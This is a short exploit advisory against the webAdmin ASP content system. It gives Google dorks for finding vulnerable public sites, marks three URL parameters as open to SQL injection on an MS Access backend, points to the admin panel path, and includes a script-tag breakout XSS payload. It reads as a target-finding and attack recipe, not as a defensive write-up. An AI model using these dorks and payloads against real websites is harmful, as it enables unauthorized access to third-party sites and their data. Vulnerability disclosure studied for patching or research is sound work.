facebook facebook twitter rss

webAdmin Sql Injection/Cross-Site Scripting Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013
webAdmin Sql Injection/Cross-Site Scripting Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Dork : [1]inurl:"events.asp?id=" "powered by webadmin "
[2]inurl:"img.asp?gall=" "powered by webadmin "
[3]inurl:"gallery.asp?gall=" "powered by webadmin "
####################################################################
===[ Exploit ]===

Multiple Sql Injection:
=======================

1-type Database: Ms Access

www.site.com/events.asp?id=[inject]
www.site.com/img.asp?gall=[inject]
www.site.com/gallery.asp?gall=[inject]

Admin Panel:
www.site.com//webadmin/


Cross-Site Scripting:
=====================

www.site.com/gallery.asp?gall='"--></style></script><script>alert(0x0000B6)</script>


####################################################################

Like us on Facebook :